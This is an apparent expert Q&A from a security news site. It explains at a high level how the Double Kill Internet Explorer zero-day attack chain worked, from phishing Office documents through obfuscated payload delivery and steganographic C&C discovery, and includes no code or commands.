Microsoft patched a zero-day vulnerability known as Double Kill that affects Internet Explorer and other applications...
using Office documents. How does the Double Kill exploit work and why is it so difficult to detect?
Advanced persistent threat (APT) attacks usually display a level of technical sophistication that isn't observed in more common criminal attacks; however, they do use a very similar framework. Many attacks use phishing techniques to get the target to open a malicious file that then downloads a tool to download a Trojan that takes over the system and communicates with a command-and-control server.
While more common attacks don't typically use zero-days, APT groups do use zero-day exploits, when necessary, because the groups have the resources and skills to find or purchase them.
One APT attack that exploited an Internet Explorer zero-day vulnerability in a multistage attack was identified by the Qihoo 360 Core Security team and named Double Kill. While the researchers didn't identify how the malicious Microsoft Office file got to the target, it is thought to have been through standard phishing.
The Qihoo 360 Core Security team provided additional details about the Double Kill vulnerability after Microsoft released a patch for the vulnerability. The malicious Office document includes Object Linking and Embedding auto-link objects that embed the document used to open a website with the Internet Explorer VBScript engine. This can trigger the exploit and eventually execute a PowerShell command on the file system.
The APT attack continues by using extensive obfuscation to hide itself by further encrypting the payload used in the exploit to install the Trojan, making it more difficult to analyze or detect. Memory reflection uploading is then used to execute code in the exploit. It does not require a file on the local system to execute, but image steganography is used in the attack to identify the C&C server.
It should also be noted that later in the APT attack, multiple files are downloaded or created on the system to execute on the local system.
Ask the expert:
Have a question about enterprise threats? Send it via email today. (All questions are anonymous.)
Dig Deeper on Microsoft Windows security
Related Q&A from Nick Lewis
Cisco Talos' Thanatos ransomware decryptor can recover files affected by new ransomware that won't decrypt ransomed files even when a ransom has been... Continue Reading
A phishing campaign targeting Trezor wallets may have poisoned DNS or hijacked BGP to gain access. Learn how the attack worked and how to mitigate it... Continue Reading
Okta researchers found a bypass that allows macOS malware to pose as signed Apple files. Discover how this is possible and how to mitigate this ... Continue Reading
Have a question for an expert?
Please add a title for your question
Get answers from a TechTarget expert on whatever's puzzling you.